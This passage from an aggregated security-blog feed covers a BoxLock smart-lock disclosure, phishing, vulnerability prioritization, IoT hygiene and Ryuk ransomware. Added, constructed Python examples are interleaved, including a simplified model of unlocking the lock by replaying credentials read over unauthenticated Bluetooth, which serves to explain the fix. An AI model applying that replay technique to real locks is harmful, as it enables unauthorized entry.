I want to take a moment to give some very positive feedback on this vendor. Vulnerability disclosure can be a challenging issue for any company to deal with, but BoxLock was incredibly responsive, easy to work with, and immediately recognized the value that McAfee ATR had provided. Our goal is to eliminate vulnerabilities before malicious actors find them, as well as to illuminate security issues for the industry so we can raise the overall standard for security. BoxLock was an excellent example of this process at work; the day after we disclosed the vulnerability, they set up a meeting with us to discuss our findings, where we proposed a mitigation plan. The BoxLock team set a plan in place to patch not only the BoxLock firmware but the mobile applications as well. Within a week, the vendor created a patch for the vulnerability and updated the mobile apps to force a mandatory update to the patched firmware version. We tested the firmware and app update and verified that the application properly clears credentials after use on the vulnerable firmware. We also tested the new firmware, which clears the credentials even without the mobile app's interaction.
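To make the flaw and the fix concrete, here is an added, deliberately simplified model of the unlock flow described above. It is not BoxLock's firmware or app code; the characteristic names, the cloud check and the credential values are all assumptions made for the example. It models three unauthenticated, readable and writable credential characteristics plus a command characteristic that unlocks when the attribute value 2 is written, with the cloud API reduced to a comparison against one known-good credential tuple. The only difference between the vulnerable and patched variants is whether the credentials are wiped after a successful unlock, which is the behaviour the fix introduced.

```python
from dataclasses import dataclass


@dataclass
class CloudApi:
    """Stand-in for the vendor's cloud API: exactly one valid credential tuple (constructed)."""
    valid: tuple

    def authorize(self, token, email, client_id):
        return (token, email, client_id) == self.valid


class LockFirmware:
    """Simplified peripheral model, not the real BoxLock firmware.

    Three writable characteristics hold the credentials; writing OPEN_SIGNAL to
    the command characteristic asks the cloud to authorize and then unlocks.
    """

    OPEN_SIGNAL = 2  # attribute value the post says the app writes to unlock

    def __init__(self, cloud, clear_after_use):
        self.cloud = cloud
        self.clear_after_use = clear_after_use
        self.chars = {"access_token": "", "email": "", "client_id": ""}
        self.unlock_log = []

    # "Just Works" pairing: any central can read or write these, no authentication.
    def read_char(self, name):
        return self.chars[name]

    def write_char(self, name, value):
        self.chars[name] = value

    def send_open_signal(self, value, who):
        if value != self.OPEN_SIGNAL:
            return False
        creds = (self.chars["access_token"], self.chars["email"], self.chars["client_id"])
        if not all(creds) or not self.cloud.authorize(*creds):
            return False
        self.unlock_log.append(who)
        if self.clear_after_use:  # the fix: never leave valid credentials resident on the lock
            for k in self.chars:
                self.chars[k] = ""
        return True


def owner_unlock(fw, creds):
    """What the legitimate app does: write the three fields, then send the open signal."""
    token, email, client_id = creds
    fw.write_char("access_token", token)
    fw.write_char("email", email)
    fw.write_char("client_id", client_id)
    return fw.send_open_signal(LockFirmware.OPEN_SIGNAL, "owner")


def stranger_unlock(fw):
    """A phone that never paired and has no app installed: just writes the open signal."""
    return fw.send_open_signal(LockFirmware.OPEN_SIGNAL, "stranger")


def replay_unlock(fw):
    """Read the three fields off the lock, write them back, unlock: the replay from the post."""
    stolen = {k: fw.read_char(k) for k in fw.chars}
    if not all(stolen.values()):
        return False
    for k, v in stolen.items():
        fw.write_char(k, v)
    return fw.send_open_signal(LockFirmware.OPEN_SIGNAL, "replay")


def demo(clear_after_use):
    """Run owner, stranger and replay attempts against one lock; returns their outcomes."""
    creds = ("tok-123", "owner@example.com", "client-abc")  # constructed values
    fw = LockFirmware(CloudApi(creds), clear_after_use)
    return owner_unlock(fw, creds), stranger_unlock(fw), replay_unlock(fw)


if __name__ == "__main__":
    print("vulnerable (credentials persist):", demo(clear_after_use=False))
    print("patched (cleared after use):     ", demo(clear_after_use=True))
```

Clearing after use closes both the "stranger" and the "replay" paths in this model, but note what it does not fix: with Just Works pairing, an attacker sniffing the link while the owner's app writes the credentials can still capture and reuse them before they are consumed. Wiping credentials is a mitigation; authenticated pairing or single-use tokens issued by the cloud would address the root cause.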

IoT security has increasingly become a deciding factor for consumers. The process of vulnerability disclosure is an effective method to increase collaboration between vendors, manufacturers, the security community and the consumer. It is our hope that vendors move towards prioritizing security early in the product development lifecycle. We’d like to thank BoxLock for an effective end-to-end communication process, and we’re pleased to report that this significant flaw has been quickly eradicated. We welcome any questions or comments on this blog!

The post What’s in the Box? appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity becomes more popular each day, it is also important to mention that there is a shortage of skilled people within the industry. Many recruiters create dedicated cybersecurity departments so they can stay competitive and fill the gap. According to Forbes, the cybersecurity market is expected to hit $170 billion by 2020, and cybersecurity jobs are expected to reach 6 million by the end of 2019. It's no secret that the rapid growth of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) reveals that at first cybersecurity companies wanted to hire as many people as possible. However, now they are more concentrated on how to find not many, but just the right people for the right position. It is extremely important for a recruiter to match the candidate’s expectations with the requirement and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

A leading global recruiting firm focused on the cybersecurity industry in the USA, Europe, APAC and LATAM. Shield Security Recruiters have the global expertise and knowledge to bring you the quality cybersecurity candidates you deserve, expect and need.

3P&T Security Recruiting

3P&T has been successful in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the Seattle, USA area.

Adeptis Group

A great UK-based company which is highly trusted among infosec professionals in Europe. They are always ready to provide expert advice to their clients.

Alta Associates

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

Acumin Consulting

The company is based in London, but they operate internationally with a special focus on cybersecurity and risk management recruitment. They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere Consulting

This company is focusing on quality, speed and cost effectiveness to provide a more specialized approach to source the best talents in cybersecurity. Their services include direct hire, consulting or hiring on a contract for a specific project.

Caliber Security Partners

Their specialty is recruiting and staff augmentation, short term or long term. They establish trusting relationships with their clients to identify their true talent needs. Another good addition to our cybersecurity search firms list.

Computer Futures

The company provides a platform both for companies looking for potential talent and for people looking for a career in the cybersecurity industry. They have a dedicated cybersecurity and business risk team that provides individual solutions.

Cyber Exec

Cyber Exec is headquartered in Houston, Texas, but operates internationally in cities such as Tokyo and London. They definitely know how to find the best C-level employees.

CISORecruiter

As the name suggests, this company is a team of professionals who will take care of your needs and provide you with the right people for your cybersecurity company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA and has been in business since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiter that works together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

Infosec People

The company was launched in 2008 and is currently one of the leading cybersecurity recruitment companies in the UK. You can easily find a role, find people or get advice on their website.

KnownFour

Another UK company, whose owners have been in international recruiting services for more than 20 years. Their information security department works closely with experts to provide the right solution to their clients.

Redbud Cyber Security

Redbud has national reach in the USA and sources all kinds of positions, from analysts and engineers to CISOs. They are well known within the industry and can provide some of the best cyber talent.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.

Weekly Update 127


It was another travel week so another slightly delayed weekly update, but still plenty of stuff going on all the same. Along with a private Sydney workshop earlier on, I'm talking about some free upcoming NDC meetup events in Brisbane and Melbourne that I'd love to get a great turnout for. I've just ordered 10k more HIBP stickers to last me through upcoming events so they'll be coming with me.

In other news, there was old news appearing as new news about how hosed you are if your machine is compromised, with the level of hosing extending to your password manager. This will inevitably be another one of those times where something gets blown out of proportion (and context) in some of the news headlines, then we'll all go back to more sane discussions about assessing relative risks, likelihoods and impacts. There's also a very steady feed of breaches making their way into HIBP after appearing for sale on dark web marketplaces, so I give a bit of an update on those as well.

All that and more this week in a slightly shorter form than usual, enjoy!


References

  1. Catch me in Brisbane next week at the NDC meetup (free, and very close to capacity already)
  2. Or catch me in Melbourne a couple of weeks later for the NDC meetup there (that event has just gone up so there's tickets left, but there's also strong interest)
  3. Order yourself some Have I Been Pwned stickers (and help me by using the referral code in that blog post so I can buy more to give away at events)
  4. Twilio is sponsoring my blog this week (they're talking about how easy it is to use Authy for 2FA instead of risky SMS)

Don’t Take the Bait! How to Steer Clear of Tax Time Scams

For cybercriminals, tax time is the most wonderful time of the year. They are in the shadows, giddy, eager, and methodically setting a variety of digital traps, knowing that enough taxpayers will take the bait to make their efforts worthwhile.

Indeed, with the frenzy of online tax filings, personal information (and money) moving through mailboxes, and hardworking people eagerly awaiting tax refunds, crooks are perfectly positioned for big returns this year.

So let’s be wiser and let’s be ready.

Last year, the IRS noted a 60 percent spike in bogus email schemes seeking to steal money or tax information. This year it's a surge in phishing scams, says the IRS, that should have taxpayers on alert.

“The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails,” said IRS Commissioner Chuck Rettig. “Watch your inbox for these sophisticated schemes that try to fool you into thinking they’re from the IRS or our partners in the tax community. Taking a few simple steps can protect yourself during the holiday season and at tax time.”

Scams to Look For

According to the IRS, phishing emails are circulating with subjects such as “IRS Important Notice,” “IRS Taxpayer Notice” and other iterations of that message. The fraudulent emails may demand payment with the threat of seizing the recipient’s tax refund or even jail time.


Attacks may also use email or malicious links to solicit tax or financial information by posing as a trustworthy organization or even a personal friend or business associate of the recipient.

While some emails may have obvious spelling errors or grammar mistakes, some scammers have gone to great lengths to piece together a victim’s personal information to gain their trust. These emails look legitimate, have an authentic tone, and are crafted to get even skeptics to compromise personal data using malicious web links.

Scams include emails with hyperlinks that take users to a fake site, or PDF attachments that download malware designed to grab sensitive information off your devices. With the right data in hand, such as a Social Security number, crooks can file a fake return and claim your refund, open credit cards, or run up medical bills.

Other tax scams include threatening phone calls from bogus IRS agents demanding immediate payment of past due tax bills and robocalls that leave urgent callback messages designed to scare victims into immediate payment.

Remember, the IRS will NOT:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

How to Protect Yourself

Be hyper-aware. Never open a link or attachment from an unknown or suspicious source. In fact, approach all emails with caution even those from people you know. Scams are getting more sophisticated. According to the IRS, thieves can compromise a friend’s email address, or they may be spoofing the address with a slight change in the email text that is hard to recognize.
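The "slight change in the address" trick the IRS describes comes in a few recognisable shapes: a look-alike registrable domain (irs-gov.com, 1rs.gov), the real domain planted as a subdomain of an attacker's domain (irs.gov.verify-account.net), and a plain display name that says "IRS" in front of an unrelated mailbox. The following is an added example, not from the original post, that classifies a From: header into those cases. The sample headers are constructed for the example, the digit-to-letter folding table and the naive two-label "registrable domain" rule are assumptions (production code should use the Public Suffix List), and the legitimate domain is taken to be irs.gov.

```python
import re
from email.utils import parseaddr

LEGIT_DOMAIN = "irs.gov"
# Display names that claim to be the agency (whole word "irs" or "internal revenue").
CLAIMS_IRS = re.compile(r"\birs\b|internal revenue")
# Digits commonly substituted for look-alike letters in phishing domains (assumed table).
FOLD = str.maketrans({"0": "o", "1": "i", "3": "e", "5": "s", "7": "t"})


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming version)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """Naive: the last two labels. Real code should consult the Public Suffix List."""
    return ".".join(host.split(".")[-2:])


def squash(s):
    """Fold digit look-alikes and drop punctuation so 'irs-g0v' and 'irs.gov' compare equal."""
    return re.sub(r"[^a-z0-9]", "", s.translate(FOLD))


def assess(from_header):
    """Classify a From: header. Returns (address, verdict)."""
    name, addr = parseaddr(from_header)
    host = addr.rsplit("@", 1)[-1].lower()
    reg = registrable_domain(host)
    if reg == LEGIT_DOMAIN:
        return addr, "legitimate-domain"
    if host.startswith(LEGIT_DOMAIN + "."):
        return addr, "legit-domain-as-subdomain"      # irs.gov.verify-account.net
    target = squash(LEGIT_DOMAIN)
    sld = reg.split(".")[0]
    if min(levenshtein(squash(reg), target), levenshtein(squash(sld), target)) <= 1:
        return addr, "lookalike-domain"                # irs-gov.com, 1rs.gov
    if CLAIMS_IRS.search(name.lower()):
        return addr, "display-name-spoof"              # "IRS ..." <anything@gmail.com>
    return addr, "unrelated"


# Constructed sample headers for the example.
SAMPLES = [
    "IRS Notices <noreply@irs.gov>",
    "IRS Taxpayer Notice <refunds@irs-gov.com>",
    "Internal Revenue Service <notice@irs.gov.verify-account.net>",
    "IRS <support@1rs.gov>",
    "IRS Refund Department <taxrefund2019@gmail.com>",
    "Chris <chris@example.com>",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print("%-60s %s" % (header, assess(header)[1]))
```

A "legitimate-domain" verdict only means the visible address matches; the From: header itself can be forged, so it is worth something only when the receiving mail server has checked SPF, DKIM and DMARC for that domain.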

Reduce your digital footprint. Now is a great time to go through your social accounts and online profiles, posts, and photos and boost your family’s privacy. Edit out any personal information such as your alma mater, your address, birthdate, pet names, children’s names, or mother’s maiden name. Consider making your social profiles private and filtering your friends’ list to actual people you know.

Have a strong password strategy. Cybercrooks count on their victims reusing the same password across multiple accounts. Lock them out by using a unique password for each account. Also, consider using two-factor authentication, which requires a security code (sent to your phone) to access your account.

Install security software. Phishing emails carry malware and viruses designed to infect your devices and grab your family’s sensitive data or even seize your computer via ransomware. Crooks aren’t messing around so neither should you. Meet fire with fire by investing in comprehensive security software to protect your devices.

If you are the victim of tax fraud or identity theft, take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, forward them to phishing@irs.gov  (then delete the emails).

The post Don’t Take the Bait! How to Steer Clear of Tax Time Scams appeared first on McAfee Blogs.

Why You Should Reconsider Prioritizing High Severity Vulnerabilities in Your Fix Schedule


When it comes to vulnerabilities, there is a range of severity and exploitability, which often dictates how quickly a flaw is fixed once discovered. Most companies prioritize high severity and critical vulnerabilities but deprioritize or ignore lower severity ones. The highest severity flaws are less complicated to attack, offer more opportunity for full application compromise, and are more likely to be remotely exploitable; overall they tend to have a wider blast radius.

In the State of Software Security Volume 9, we analyzed flaw persistence based on where vulnerabilities fall on our five-point severity scale, and we found that organizations hit the three quarters-closed mark about 57% sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low severity flaws were attended to at a significantly slower rate than the average speed of closure. It took organizations an average of 604 days to close three quarters of these weaknesses.

Here’s the catch: there could be a low severity vulnerability that is affecting your code and it could be used to exploit your application.

Is the Vulnerability in the Execution Path?

There's another dimension that often isn't taken into account when prioritizing fixes, and that's whether the vulnerability actually affects the code paths your application runs. When it comes to open source risk, for example, we know that it is multi-faceted and complex. Simply having a library with vulnerabilities in it does not mean that your app is at risk; you first have to understand whether the vulnerable method is ever called. When using an open source library, it is very common for a developer to use only a small subset of it for one particular function or capability. This means it is entirely possible that your application never calls the vulnerable method, in which case the flaw is not exploitable through your application.

Rather than prioritizing fixing a high-severity vulnerability in a function that is not called by your application, it would be more advantageous to prioritize a medium-severity vulnerability that lies in the execution path and puts your customers at risk. When developers have this information, they are empowered to prioritize and immediately fix vulnerabilities that pose the highest likelihood of exploitation. Additionally, their remediation time is reduced by up to 90 percent. The time saved for your developers, and the decreased time the attack window is open, is crucial to protecting your data.

That being said, just because a vulnerability isn’t in the execution path doesn’t necessarily mean your application isn’t exploitable – it may simply mean we were unable to identify an execution path for the vulnerability. It’s still important to fix all of the vulnerabilities in your application, especially the high and very high ones. Vulnerable method information allows your team to know, out of all of the vulnerabilities detected, which ones have the highest likelihood of exploit.
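The prioritization the post describes is a reachability question over the application's call graph: is the vulnerable method on any path from an entry point? The following is an added example, not Veracode's code or algorithm; it uses a constructed call graph for a hypothetical app with two bundled libraries and constructed advisories on the post's five-point severity scale, walks the graph from the entry point, and orders the advisories with reachable ones first and severity as the tie-breaker.

```python
from collections import deque

# Constructed call graph: caller -> callees. "app.*" is first-party code; "zipper.*"
# and "tpl.*" are hypothetical open source libraries packaged with the app.
CALL_GRAPH = {
    "app.main": ["app.handle_upload", "app.render_report"],
    "app.handle_upload": ["zipper.extract"],
    "app.render_report": ["tpl.render"],
    "zipper.extract": ["zipper.normalize_path"],
    "zipper.normalize_path": [],
    "tpl.render": ["tpl.escape"],
    "tpl.escape": [],
    "tpl.eval_expr": [],  # shipped in the library, never called by the app
}

# Constructed advisories: severity 1 (low) .. 5 (very high), plus the vulnerable method.
ADVISORIES = [
    {"id": "ADV-0001", "method": "tpl.eval_expr", "severity": 5},
    {"id": "ADV-0002", "method": "zipper.normalize_path", "severity": 3},
    {"id": "ADV-0003", "method": "tpl.escape", "severity": 1},
]


def reachable(graph, entry):
    """All methods reachable from `entry` by following static call edges (BFS)."""
    seen = {entry}
    queue = deque([entry])
    while queue:
        for callee in graph.get(queue.popleft(), []):
            if callee not in seen:
                seen.add(callee)
                queue.append(callee)
    return seen


def prioritize(graph, entry, advisories):
    """Order advisories: those in the execution path first, then by severity descending.

    Returns a list of (advisory id, in_execution_path, severity). An advisory that is
    not reachable is still listed; static reachability can miss reflection and dynamic
    dispatch, so "not found reachable" must not be read as "safe".
    """
    reach = reachable(graph, entry)
    rows = [(a["id"], a["method"] in reach, a["severity"]) for a in advisories]
    return sorted(rows, key=lambda r: (not r[1], -r[2]))


if __name__ == "__main__":
    for adv_id, in_path, sev in prioritize(CALL_GRAPH, "app.main", ADVISORIES):
        print("%s  in_execution_path=%-5s severity=%d" % (adv_id, in_path, sev))
```

On this graph the very-high ADV-0001 sorts last because nothing the app runs ever reaches `tpl.eval_expr`, while the medium ADV-0002 sorts first: exactly the reordering the post argues for. The unreachable advisory stays on the list rather than being dropped, for the reason given above.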

How Veracode’s Software Composition Analysis Can Help

With many tools out there, developers will receive an extremely large list of vulnerabilities for all open source libraries packaged in your application, and they will have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. Download the Addressing Your Open Source Risk eBook to learn more about how Veracode’s combination of machine learning and natural language can help you efficiently and effectively manage open source risk.

Quick Heal Threat Report – Cryptojacking rising but Ransomware still #1 threat for consumers

In the wake of the growing number of targeted cyber-attacks on enterprises using cryptojacking, chosen for its ease of deployment and instant return on investment, it comes as a surprise that malware authors are still counting on ransomware for targeting consumers and home users. Yes, you heard it right! According…

What’s the greater risk to UK 5G, Huawei backdoors or DDoS?

Have we been focusing too much on the Huawei backdoor threat instead of the DDoS threat facing the incoming 5G network infrastructure? Lee Chen, CEO at A10 networks thinks so.

The size and sophistication of distributed denial-of-service (DDoS) attacks have risen at an ever-accelerating pace. As new 5G networks become operational, we expect attack sizes to dwarf the records set so far. This is primarily due to the increase in IoT devices that 5G will bring, with the number set to reach 4.1 billion globally by 2024. Each device is a perfect nest for botnet malware, offering a new DDoS weapon for attackers to take advantage of.

Service providers will need to evolve rapidly with these growing threats and adopt intelligent automation to detect and mitigate security anomalies in a matter of seconds. Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.


The Huawei threat remains a political football: there is still uncertainty over whether the Chinese telecoms giant's network devices will be banned in the UK or not. I have updated my post - Is Huawei a Threat to UK National Security? - with the latest developments.

Three Tips to Help You Secure IoT Devices in the Workplace

The popularity of Internet of Things (IoT) devices is steadily on the rise. In fact, IoT Analytics projects that there will be 22 billion active IoT devices by the year 2025. What does this mean for the office, and more specifically, the IT or security team? In short, these teams can expect a growing challenge in securing these devices as they become more commonplace in the office.

It’s no wonder that these devices are becoming a popular fixture in the workplace: they make everyday tasks easier, which in turn makes employees happier and more efficient. For example, many offices may deploy smart vending machines that report when they are running low on an item and request a restock from the mothership. We’re also seeing an increase in smart conferencing setups, TVs, and even smart desks. Add this to the existing, well-known IoT infrastructure devices, such as HVAC and alarm systems, and you’ve got an entire office full of IoT devices.

While these devices can improve the quality of a work environment, they have the opposite effect on the security of this environment.

IoT Vulnerabilities

Oftentimes, these devices will have a camera, microphone, or some other way of recording information. If one of those devices is breached, an attacker can essentially spy on your organization and record loads of valuable and potentially sensitive information.

The biggest concern, though, is that many of the infrastructure devices mentioned above are poorly configured. When poorly configured devices are connected to the same network as the rest of the business, they create an easy path for attackers into your sensitive data.

How to Secure IoT Devices

So how can we ensure that our office, whether it be a home office or a corporate office, isn’t at risk because of an IoT device? While there’s no easy solution, there are steps you can take to secure these devices and reduce the chance of an incident: 

1. Create an IoT device policy for the office.

In this policy, address which devices employees can and cannot bring into the office and whether or not they can connect them to the office network. Include a password strategy in your IoT policy that requires every default password to be changed, and encourage strong passwords or multi-factor authentication.

It’s also a good idea to include in the policy a way to ensure that any IoT devices in the office are regularly patched and updated.

2. Connect IoT devices to a separate network.

Perhaps the best way to reduce risk from IoT devices in the office is to connect these devices to a separate network. If they are compromised, the damage can be contained within a smaller network rather than the whole company’s network.

If you are unsure of your network configuration or need advice on how to segment these devices onto their own network, consider engaging experts for a Network Security & Architecture Review. This can reveal weaknesses in your network and map out the best way to secure it.

3. Monitor all IoT device activity.

Once you decide who, what, where, and how the devices will be connected, keep an eye on the devices’ activity. Monitor the devices and how they interact with your network, either in-house or through a third-party Managed Security Service Provider (MSSP). This lets you respond quickly if a device has been compromised.
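The three tips can be checked mechanically. The following added example is not GRA Quantum’s tooling; it uses a constructed device register, a constructed segment plan (10.20.0.0/24 for IoT devices, 10.10.0.0/24 for corporate hosts) and constructed flow records to flag stale firmware (tip 1), an unknown device on the IoT segment and IoT-to-corporate traffic (tips 2 and 3), and an inventoried IoT device that has been plugged into the corporate LAN. In a real deployment the inventory would come from the policy register and the flows from DHCP leases plus NetFlow or firewall logs.

```python
"""Policy checks over IoT network activity (added example, not GRA Quantum's code).

Inventory, segment plan and flow records are all constructed for the example.
"""
import ipaddress
from datetime import date

IOT_NET = ipaddress.ip_network("10.20.0.0/24")    # dedicated IoT segment (tip 2)
CORP_NET = ipaddress.ip_network("10.10.0.0/24")   # corporate workstations and servers
MAX_PATCH_AGE_DAYS = 90                           # policy: firmware updated at least quarterly
REPORT_DATE = date(2019, 2, 28)                   # 'today' for the constructed run

# Tip 1: approved devices from the IoT policy register (constructed).
INVENTORY = {
    "aa:bb:cc:00:00:01": {"name": "vending-machine-2f", "last_patched": date(2019, 1, 15)},
    "aa:bb:cc:00:00:02": {"name": "conference-tv-4a", "last_patched": date(2018, 6, 1)},
    "aa:bb:cc:00:00:03": {"name": "hvac-controller", "last_patched": date(2019, 2, 1)},
}

# Tip 3: flow records as (mac, src_ip, dst_ip, dst_port, bytes) (constructed).
FLOWS = [
    ("aa:bb:cc:00:00:01", "10.20.0.11", "203.0.113.10", 443, 12_000),  # vending -> vendor cloud: fine
    ("aa:bb:cc:00:00:02", "10.20.0.12", "10.10.0.50", 445, 80_000),    # TV -> corporate file server
    ("aa:bb:cc:00:00:09", "10.20.0.77", "198.51.100.9", 6667, 900),    # unknown device -> IRC port
    ("aa:bb:cc:00:00:03", "10.10.0.23", "203.0.113.20", 443, 5_000),   # HVAC plugged into corp LAN
]

def check_inventory(inventory, today=REPORT_DATE, max_age_days=MAX_PATCH_AGE_DAYS):
    """Tip 1: MACs of devices whose firmware is older than the policy allows."""
    return sorted(
        mac for mac, dev in inventory.items()
        if (today - dev["last_patched"]).days > max_age_days
    )

def check_flows(flows, inventory, iot_net=IOT_NET, corp_net=CORP_NET):
    """Tips 2 and 3: one finding per flow that breaks the segmentation policy."""
    findings = []
    for mac, src, dst, port, _ in flows:
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        # A device on the IoT segment that nobody registered.
        if src_ip in iot_net and mac not in inventory:
            findings.append(("unknown-device", mac, src))
        # The IoT segment must never initiate traffic into the corporate segment.
        if src_ip in iot_net and dst_ip in corp_net:
            findings.append(("iot-to-corp", mac, f"{src}->{dst}:{port}"))
        # A registered IoT device seen with a corporate address is on the wrong network.
        if mac in inventory and src_ip in corp_net:
            findings.append(("iot-on-corp-segment", mac, src))
    return findings

if __name__ == "__main__":
    print("stale firmware:", check_inventory(INVENTORY))
    for finding in check_flows(FLOWS, INVENTORY):
        print(finding)
```

The destination port and byte count are carried in each record so that the same loop can be extended with volume or port-based rules (for example, a vending machine talking to an IRC port) once the basic segmentation rules are in place.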

The increasing popularity of IoT devices undoubtedly creates a problem for IT administrators. But with the tips above, you can still take advantage of the conveniences IoT devices provide without drastically increasing your organization’s exposure.

The post Three Tips to Help You Secure IoT Devices in the Workplace appeared first on GRA Quantum.

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.

 

At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, industry peers have collectively discovered additional technical details on Ryuk’s inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware piggybacks on the infamous and ever-evolving Trickbot as its primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within Cyber Threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capabilities, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: “An adversary, cyber-criminal(s), has a capability (Ryuk ransomware) that is being spread via a TrickBot infection infrastructure targeting specific victims.”

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence we welcome research published by our industry peers and assimilate any insights that challenge our hypotheses. When we combined all the evidence with the links on the diamond model, we discovered that one essential link hadn’t been made: the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite the published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently create a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between adversary and victim often generates valuable insights, especially in cases where (extensive) negotiations take place.

Luckily, one of our NoMoreRansom partners, Coveware, specializes in ransomware negotiations and has gained valuable insights that help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regard to Ryuk, it should be noted that its ransom amounts average more than 10x the average across ransomware families, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

